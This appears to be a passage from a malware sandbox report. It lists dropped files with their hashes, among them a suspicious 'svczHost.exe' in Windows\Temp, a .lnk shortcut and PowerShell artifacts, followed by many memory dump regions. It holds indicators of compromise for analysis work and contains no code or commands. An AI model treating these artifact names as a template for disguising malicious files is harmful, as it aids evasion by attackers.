24fe4752df102c2ef492954d6b046cb5512ad408

SHA256
b1f292b6199aa29c7fafbca007e5f9e3f68edcbbca1965bc828cc92dc0f18bb8

SHA512
0f91e2da0da8794b9797c7b50eb5dfd27bde4546ceb6902a776664ce887dd6f12a0dd8773d612ccc76dfd029cd280778a0f0ae17ce679b3d2ffd968dd7e94a00

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
7f2baf9f564f57b2d899d3ffeebc1e20

SHA1
5bfa2f385b3d91af6b2e2726133da0eced5e0c58

SHA256
70076f6c9abc390f0da669fcff2505acd34df3f2f110410a97de38d957597d27

SHA512
53be49323730aa7ee6d47714ae3760d8f82acfb878accc585f3702491f4f0c6d439fe35619d26cf02d56bac989e0d1f11da773929005889e84660ea98fe5f6f7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
5caad758326454b5788ec35315c4c304

SHA1
3aef8dba8042662a7fcf97e51047dc636b4d4724

SHA256
83e613b6dc8d70e3bb67c58535e014f58f3e8b2921e93b55137d799fc8c56391

SHA512
4e0d443cf81e2f49829b0a458a08294bf1bdc0e38d3a938fb8274eeb637d9a688b14c7999dd6b86a31fcec839a9e8c1a9611ed0bbae8bd59caa9dba1e8253693

Download Submit
C:\Users\Admin\AppData\Local\Temp\2.docx

Filesize
13KB

MD5
593b751b7f58d06173431e1f9ad95c89

SHA1
08f7fead968a430bbab23f5a10f6d5e4c64a334e

SHA256
0782b634ed40fc90f00e43afe586cf31a812b3d43f55a1572338df113f8a2b3e

SHA512
c22f8d4d4074268de925d932c3d70fe2c66559fbbc7be9ea24acd63ee82c58fa87538eeabde883e807016b20400b6efd180e48c0308fc79b0724d703d5a2688d

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3hsxd3pv.g43.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\AppData\Local\Temp\tmpyl4tkeg5.lnk

Filesize
15KB

MD5
b5aded587a83b97147073b33e294d117

SHA1
88b917119c2270e7e9582e2b5c1c8a57ed35e5b8

SHA256
484b465dea76dc77bbbe23d5fd27755251a64ee642a80252615cd9ae17c45bcf

SHA512
dd7a84ce56322542368faea42a02313a178ca392e1f13b0107afaa50c3f22063ecb4604b5d3f6056df8631c29f365c89002f62b861c9c8d2bbd8b686aa4cde7e

Download Submit
C:\Windows\Temp\svczHost.exe

Filesize
8.4MB

MD5
d6892b563e26fac43ef8ebec24e04509

SHA1
3d3e4412be48ea8b5ed5ca94e5239228841261bb

SHA256
6fa92749a9798450d7f7a7cd8cf7b5132ac9b90f0e0095185d8884393af45cc6

SHA512
276a1d74624d5d59f80e64f03ff51a0908d30261a434821e4fe6b04cf1faf8230b998a9dcd432976437cae301b41ef554e103d0410e684c3dad46fb3299e7475

Download Submit
C:\Windows\Temp\svczHost.exe

Filesize
8.4MB

MD5
d6892b563e26fac43ef8ebec24e04509

SHA1
3d3e4412be48ea8b5ed5ca94e5239228841261bb

SHA256
6fa92749a9798450d7f7a7cd8cf7b5132ac9b90f0e0095185d8884393af45cc6

SHA512
276a1d74624d5d59f80e64f03ff51a0908d30261a434821e4fe6b04cf1faf8230b998a9dcd432976437cae301b41ef554e103d0410e684c3dad46fb3299e7475

Download Submit
C:\Windows\Temp\svczHost.exe

Filesize
8.4MB

MD5
d6892b563e26fac43ef8ebec24e04509

SHA1
3d3e4412be48ea8b5ed5ca94e5239228841261bb

SHA256
6fa92749a9798450d7f7a7cd8cf7b5132ac9b90f0e0095185d8884393af45cc6

SHA512
276a1d74624d5d59f80e64f03ff51a0908d30261a434821e4fe6b04cf1faf8230b998a9dcd432976437cae301b41ef554e103d0410e684c3dad46fb3299e7475

Download Submit
memory/1764-40-0x00007FF86EBC0000-0x00007FF86F681000-memory.dmp

Filesize
10.8MB

Download
memory/1764-53-0x000001B4C6420000-0x000001B4C6430000-memory.dmp

Filesize
64KB

Download
memory/1764-61-0x00007FF86EBC0000-0x00007FF86F681000-memory.dmp

Filesize
10.8MB

Download
memory/1764-42-0x000001B4C6420000-0x000001B4C6430000-memory.dmp

Filesize
64KB

Download
memory/1764-41-0x000001B4C6420000-0x000001B4C6430000-memory.dmp

Filesize
64KB

Download
memory/2672-106-0x0000022469F40000-0x0000022469F50000-memory.dmp

Filesize
64KB

Download
memory/2672-105-0x00007FF86EBC0000-0x00007FF86F681000-memory.dmp

Filesize
10.8MB

Download
memory/2672-107-0x0000022469F40000-0x0000022469F50000-memory.dmp

Filesize
64KB

Download
memory/2672-126-0x00007FF86EBC0000-0x00007FF86F681000-memory.dmp

Filesize
10.8MB

Download
memory/4060-21-0x00007FF86EBC0000-0x00007FF86F681000-memory.dmp

Filesize
10.8MB

Download
memory/4060-18-0x000001CEFC420000-0x000001CEFC430000-memory.dmp

Filesize
64KB

Download
memory/4060-13-0x000001CEFC420000-0x000001CEFC430000-memory.dmp

Filesize
64KB

Download
memory/4060-12-0x000001CEFC420000-0x000001CEFC430000-memory.dmp

Filesize
64KB

Download
memory/4060-11-0x00007FF86EBC0000-0x00007FF86F681000-memory.dmp

Filesize
10.8MB

Download
memory/4060-10-0x000001CEFC3D0000-0x000001CEFC3F2000-memory.dmp

Filesize
136KB

Download
memory/4240-77-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-63-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-67-0x00007FF84CEB0000-0x00007FF84CEC0000-memory.dmp

Filesize
64KB

Download
memory/4240-68-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-69-0x00007FF84CEB0000-0x00007FF84CEC0000-memory.dmp

Filesize
64KB

Download
memory/4240-70-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-66-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-72-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-71-0x00007FF84CEB0000-0x00007FF84CEC0000-memory.dmp

Filesize
64KB

Download
memory/4240-73-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-74-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-75-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-76-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-64-0x00007FF84CEB0000-0x00007FF84CEC0000-memory.dmp

Filesize
64KB

Download
memory/4240-78-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-79-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-80-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-81-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-82-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-161-0x00007FF88A5D0000-0x00007FF88A899000-memory.dmp

Filesize
2.8MB

Download
memory/4240-85-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-83-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-86-0x00007FF84AB90000-0x00007FF84ABA0000-memory.dmp

Filesize
64KB

Download
memory/4240-87-0x00007FF84AB90000-0x00007FF84ABA0000-memory.dmp

Filesize
64KB

Download
memory/4240-88-0x00007FF88A5D0000-0x00007FF88A899000-memory.dmp

Filesize
2.8MB

Download
memory/4240-160-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-62-0x00007FF84CEB0000-0x00007FF84CEC0000-memory.dmp

Filesize
64KB

Download
memory/4240-157-0x00007FF84CEB0000-0x00007FF84CEC0000-memory.dmp

Filesize
64KB

Download
memory/4240-158-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-159-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-156-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-155-0x00007FF84CEB0000-0x00007FF84CEC0000-memory.dmp

Filesize
64KB

Download
memory/4240-154-0x00007FF84CEB0000-0x00007FF84CEC0000-memory.dmp

Filesize
64KB

Download
memory/4240-153-0x00007FF84CEB0000-0x00007FF84CEC0000-memory.dmp

Filesize
64KB

Download
memory/4240-118-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-119-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-120-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-121-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-122-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-123-0x00007FF88CE30000-0x00007FF88D025000-memory.dmp

Filesize
2.0MB

Download
memory/4240-128-0x00007FF88A5D0000-0x00007FF88A899000-memory.dmp

Filesize
2.8MB

Download
memory/4676-35-0x000001F0C9180000-0x000001F0C9190000-memory.dmp

Filesize
64KB

Download
memory/4676-34-0x00007FF86EBC0000-0x00007FF86F681000-memory.dmp

Filesize
10.8MB

Download
memory/4676-36-0x000001F0C9180000-0x000001F0C9190000-memory.dmp

Filesize
64KB

Download
memory/4676-38-0x000001F0E3FF0000-0x000001F0E4166000-memory.dmp

Filesize
1.5MB

Download
memory/4676-39-0x000001F0E4380000-0x000001F0E458A000-memory.dmp

Filesize
2.0MB

Download
memory/4676-52-0x00007FF86EBC0000-0x00007FF86F681000-memory.dmp

Filesize
10.8MB

Download
memory/4676-104-0x00007FF86EBC0000-0x00007FF86F681000-memory.dmp

Filesize
10.8MB

Download
memory/4676-54-0x000001F0C9180000-0x000001F0C9190000-memory.dmp

Filesize
64KB

Download
memory/4676-55-0x000001F0C9180000-0x000001F0C9190000-memory.dmp

Filesize
64KB

Download
memory/4676-65-0x000001F0C9180000-0x000001F0C9190000-memory.dmp

Filesize
64KB

Download
memory/4676-84-0x000001F0C9180000-0x000001F0C9190000-memory.dmp

Filesize
64KB

Download